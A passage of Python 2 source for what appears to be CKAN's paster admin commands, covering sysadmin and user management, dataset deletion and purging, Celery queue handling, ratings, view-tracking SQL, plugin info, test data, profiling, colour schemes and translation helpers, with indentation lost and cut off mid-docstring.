def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True)
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state = 'active')
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
print 'Passwords do not match'
sys.exit(1)
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
sys.exit(1)
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError('Could not parse arg: %r (expected "<option>=<value>")' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
print e
sys.exit(1)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.delete()
model.repo.commit_and_remove()
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' \
else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
name = dataset.name
rev = model.repo.new_revision()
dataset.purge()
model.repo.commit_and_remove()
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def run_(self):
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
celery_args.append('--concurrency=1')
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
print 'ERROR: Failed to delete all tasks'
sys.exit(1)
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
print self.__class__.__doc__
sys.exit(1)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
print self.__class__.__doc__
sys.exit(1)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. Find the most recent date we already have data for and
# start from 2 days before it, in case new data has become available since.
# If there is no data at all, use 2011-01-01 as the start date.
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(
sql, measure_from=str(measure_from)
).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '%/dataset/'
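# '%' here is a SQL LIKE wildcard: the update below matches t.url against
# '%/dataset/' || p.name, i.e. the dataset page URL regardless of site prefix.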
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)='%s';
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;''' % summary_date
engine.execute(sql)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE t.url LIKE %s || p.name)
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class' : item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc' : plugin.__doc__,
'class' : plugin,
'implements' : []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# if this is a classmethod, remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
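# Example of the rendered output (illustrative): a line such as
#     package_show(context, data_dict)
# followed by that function's docstring lines, indented beneath it.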
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by runsnakerun.
Usage:
profile URL
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
Uses the cProfile module from the Python standard library.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
def profile_url(url):
try:
res = self.app.get(url, status=[200], extra_environ={'REMOTE_USER': 'visitor'})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
    color <'HEX'> - uses the given hex value as the base color, e.g. '#ff00ff' (must be quoted)
    color <VALUE> - a float between 0.0 and 1.0 used as the base hue
    color <COLOR_NAME> - an HTML color name used as the base color, e.g. lightblue
'''
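    # Example invocations (illustrative):
    #   paster color                - random scheme
    #   paster color '#ff00ff'      - base color from a quoted hex value
    #   paster color lightblue      - base color from an HTML color name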
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
        'aliceblue': '#f0f8ff',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
        'indianred': '#cd5c5c',
        'indigo': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
        'mediumpurple': '#9370db',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
        'palevioletred': '#db7093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
        import colorsys
        import math
        # Create num_colors related colours from the given base hue.
        # Keep only the fractional part of the saturation.
        saturation -= math.trunc(saturation)
        print hue, saturation
        colors = []
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
            # replace any malformed value with plain white
            if not re.match(r'^#[0-9a-f]{6}$', hex_color):
                hex_color = '#FFFFFF'
colors.append(hex_color)
return colors
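    # For example, create_colors(0.5, num_colors=2) would return two related
    # hex strings around the cyan hue (illustrative; the exact values depend on
    # the saturation/lightness defaults above).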
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
                    # expand 3-digit hex shorthand, e.g. '#abc' -> '#aabbcc'
                    rgb = [int(x * 2, 16) for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
            f.close()
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from pylons import config
self.ckan_path = os.path.join(os.path.dirname(__file__), '..')
i18n_path = os.path.join(self.ckan_path, 'i18n')
self.i18n_path = config.get('ckan.i18n_directory', i18n_path)
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
self.build_js_translations()
else:
print 'command not recognised'
def po2dict(self, po, lang):
'''Convert po object to dictionary data structure (ready for JSON).
This function is from pojson
https://bitbucket.org/obviel/pojson
Copyright (c) 2010, Fanstatic Developers
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the <organization> nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL FANSTATIC DEVELOPERS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
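        # Resulting structure (illustrative):
        #   {'': {'plural-forms': ..., 'lang': 'de', 'domain': 'ckan'},
        #    'msgid used in a js file': [None, 'translated string'],
        #    'plural msgid': ['msgid_plural', 'singular form', 'plural form']}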
result = {}
result[''] = {}
result['']['plural-forms'] = po.metadata['Plural-Forms']
result['']['lang'] = lang
result['']['domain'] = 'ckan'
for entry in po:
if entry.obsolete:
continue
            # only include entries that are used in a js file
occurrences = entry.occurrences
js_use = False
for occurrence in occurrences:
if occurrence[0].endswith('.js'):
js_use = True
continue
if not js_use:
continue
if entry.msgstr:
result[entry.msgid] = [None, entry.msgstr]
elif entry.msgstr_plural:
plural = [entry.msgid_plural]
result[entry.msgid] = plural
ordered_plural = sorted(entry.msgstr_plural.items())
for order, msgstr in ordered_plural:
plural.append(msgstr)
return result
def build_js_translations(self):
import polib
import simplejson as json
def create_js(source, lang):
print 'Generating', lang
po = polib.pofile(source)
data = self.po2dict(po, lang)
data = json.dumps(data, sort_keys=True,
ensure_ascii=False, indent=2 * ' ')
out_dir = os.path.abspath(os.path.join(self.ckan_path, 'public',
'base', 'i18n'))
out_file = open(os.path.join(out_dir, '%s.js' % lang), 'w')
out_file.write(data.encode('utf-8'))
out_file.close()
for l in os.listdir(self.i18n_path):
if os.path.isdir(os.path.join(self.i18n_path, l)):
f = os.path.join(self.i18n_path, l, 'LC_MESSAGES', 'ckan.po')
create_js(f, l)
print 'Completed generating JavaScript translations'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
        NOTE: This will destroy the current translations for zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
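        # e.g. 'Showing %(first)s of %(total)s datasets' is mangled to
        #      '--------%(first)s----%(total)s---------' (illustrative)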
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
